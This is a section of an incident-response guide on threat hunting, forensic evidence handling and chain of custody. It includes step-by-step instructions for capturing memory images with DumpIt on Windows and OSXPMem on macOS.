Advanced threats may be identified during the network scanning and traffic analysis. See the Network Scanning and Traffic Analysis activities.

Threat Hunting

Threat Hunting In case you went through the entire process and still you have doubts about a file, email, process, or have other reasons to believe the organization may have undetected malware, you will probably need to work on specific threat hunting procedure that matches your needs, the organization's assets, and the threat profile of potential adversaries.

The ThreatHunting.net project, is collecting different Threat Hunting techniques on their GitHub repo.

The provided Threat Hunting procedures will guide on how to address your doubts on specific issue which means, you have to be able at least able to identify the category of the possible threat then apply the steps provided by ThreatHunting.net project.

Recommendation

Digital Forensics and Evidence Capture

Summary

This component briefs the tools and procedures required to acquire the image (live or dead, depending on the situation) and securely handle data from a device (laptop, desktop, HDD, memory stick, USB stick, etc.) that is needed to later perform a malware analysis or forensic evidence process.

Overview

• Determine what kind of data acquisition (live or dead imaging) is required.
• Perform the necessary data acquisition preserving the Chain of Custody and preventing modification of the evidence.

Materials Needed

Skills Needed

• Use of evidence capture tools (below) to capture memory dumps and to byte-copy the data in order to create a forensic image to be used to execute tests without affecting the original evidence received.

Required software - depending on the data acquisition type and the operating system, you will need the following tools:

• Live imaging:
• Windows: DumpIt
• Mac OS: OSXpmem
• Linux: LiME - Linux Memory Extractor
• Dead imaging:
• DEFT distro

Additional materials

• Labels or tags
• anti-static bags
• equally sized or larger hard drive or storage device to store the image
• USB stick to collect a file log

Considerations

• Define how to handle the documentation and containment related to the data acquisition.
• Follow the data forensic analysis procedures that are required to ensure the evidence is properly handled (see "Important notes on capturing evidence for analysis" below).
• Document all the process and keep a log, including timestamps, dates, and time zones, as well as versions of software and operating system.
• Carefully consider how to protect this data in transit to analysis. See "How to handle forensic data" below for notes on the Chain of Custody.
• While byte-copying data, be extremely careful when typing the command line dd or related. Reversing the if and of flags, or confusing the label of the device block related to the source or destination device will cause the computer to destroy the evidence!
• If possible, always connect the source disk with a write blocker to prevent modification of the evidence.

Walkthrough

The Chain of Custody: How to handle forensic data

The Chain of Custody (often referred to as audit trail or chain of evidence) is the process of preserving the integrity of the digital evidence. Being able to maintain the Chain of Custody is very important for forensic evidence. This means that you need to record, and be able to prove, that authorized personnel were in control of the evidence at all times, and that no unauthorized person or device or mechanism could have altered the evidence while in our custody.

To maintain the Chain of Custody, it is imperative to carefully document what happens to the evidence. This means:

• Store the evidence in an anti-static bag, or similar appropriate container that will protect the device from static electricity or other destructive forces.

• Clearly label the evidence. There must be no confusion about a piece of evidence. All evidence, whether hard drives, USB sticks, DVDs, etc. should be clearly labeled with the following information:

• What the evidence relates to
• Who received the evidence
• Location of where the evidence was received
• Location of where the evidence was sourced from
• The date and time the evidence came into our possession

• Any other notes you think are relevant regarding this piece of evidence (the specifications of the computer a hard drive came from, etc.)

• Every time the evidence changes hands, the next person responsible for the evidence should "sign for it", which means documentation should be produced where the recipient of the evidence confirms they have received the evidence into their custody with their signature.

• Deny unauthorized personnel from accessing the data - Every reasonable effort must be taken to prevent unauthorized access to the stored evidence. This means:
• Storing the evidence in a locked safe
• Controlling access to areas where the evidence is stored and analyzed

• Not leaving unauthorized people alone with the evidence

• If you have to send evidence via courier, or the postal service:

• Special containers should be used to seal the evidence in such a way that the container cannot be opened without it being apparent (e.g. seal with special tape that, if removed, cannot be replaced without showing that the container has been opened).

• Make a copy (image) of the evidence before sending the original through the post or courier service, and generate a hash of the image.

Live or Dead Imaging?

Different processes and tools are used depending on what kind of data acquisition and investigation will be done. However, in order to make a correct decision on how to get the forensic image, you should take into account the following questions:

• Is the computer networked? The data in a networked device could be remotely erased. That's why this question is relevant and time sensitive.
• Is the computer running? Important volatile information could be lost if the computer is turned off.
• Do you want to preserve volatile data? Nowadays, sophisticated malware hides on volatile data and modern web browsers can operate in ‘incognito’ or ‘private’ mode (no information is saved). In most of these cases, preserving live evidence is the only way to go, so deleting it may cause loss of evidence. Therefore this decision should be taken in advance, based on the details gathered before the data acquisition.
• Is full-disk encryption enabled? An encrypted disk could complicate the investigation. If the disk is encrypted, the investigator should ask for the password and decrypt the disk manually.
• Is the console unlocked? if the console is locked, a live CD should be used.

Regarding the definitions, we call 'dead imaging', or 'offline imaging', the process of obtaining evidence from systems that are switched off and where no data processing is taking place, while 'live imaging', or 'memory imaging', refers to the process of making a bit-by-bit copy of memory in order to preserve the volatile data available in the device. There is a lot of information of evidentiary value that could be found in a live system. Switching it off may cause loss of volatile data such as running processes, network connections and mounted file systems. On the other hand, leaving a computer running may cause evidence to be altered or deleted. Therefore the investigator needs to decide what alternative is best in each given situation. Another approach is to use specialized tools to extract volatile data from the computer before shutting it down.

Variant: Live imaging tools and procedures

Windows: DumpIt

Brief description: DumpIt helps the user to get a memory dump in Windows systems. It is easy to use and it is possible to send the DumpIt.exe file to the victim in order to facilitate the data acquisition.

Source: in order to download DumpIt, you need to register here. Intructions can be found here.

How to use DumpIt:

Note: it is easier to provide DumpIt.exe directly to the client.

1. Make sure you have more free space on the disk or the USB key you run the memory dump from
2. Download DumpIt
3. As it is an archive, extract it (right-click, extract)
4. Connect the hard disk or USB key with DumpIt to the computer you want to do the memory acquisition from
5. Double-click on the file
6. A window will pop up. Read the message in the window: if the “Address space size” is bigger than the “Free space size”, you do not have enough space in the device. In that case, you should move DumpIt.exe to an empty USB key or SD card that is bigger than the “Address space size”
7. If the space in the device is sufficient, hit ‘y’ and wait (it can take a very long time)
8. Compress the memory dump in an encrypted archive. The best way is to use 7-ZIP, as Windows 7 does not support encryption.

MacOS: OSXPMem

Brief description: OSXPMem is a part of the pmem suite created by the developers of Rekall. Rekall itself is a very useful utility built for both memory acquisition and live memory analysis on Windows, Linux, and OS X systems.

Source:

• OSXPMem Github repository
• OSXPMem latest release
• Instructions on how to download and launch OSXPMem can be found here.

How to use OSXPMem:

Download the latest release (the latest OSXPMem release is 1.5.1 Furka).

1. Unzip the package

   $ unzip osxpmem.osxpmem-2.1.post4.zip

2. The file ownership/permissions must be changed to “root:wheel”

   $ sudo chown -R root:wheel osxpmem.app/

3. Run OSXPMem to collect memory from the local system

   $ sudo osxpmem.app/osxpmem -o OUTPUT_DIR/FILENAME.aff4

4. Check the information acquired

   $ sudo osxpmem.app/osxpmem -V OUTPUT_DIR/FILENAME.aff4

5. Extract the AFF4 memory image stream into a singular raw file for parsing/analysis by other tools

   $ sudo osxpmem.app/osxpmem -e /dev/pmem -o OUTPUT_DIR/FILENAME.raw OUTPUT_DIR/FILENAME.aff4

6. Unload the kernel extension

   $ sudo osxpmem.app/osxpmem -u

7. Check if your OS X has a memory profile available or create one if required, in order to do the analysis with the tool Volatility.

   You can check available profiles here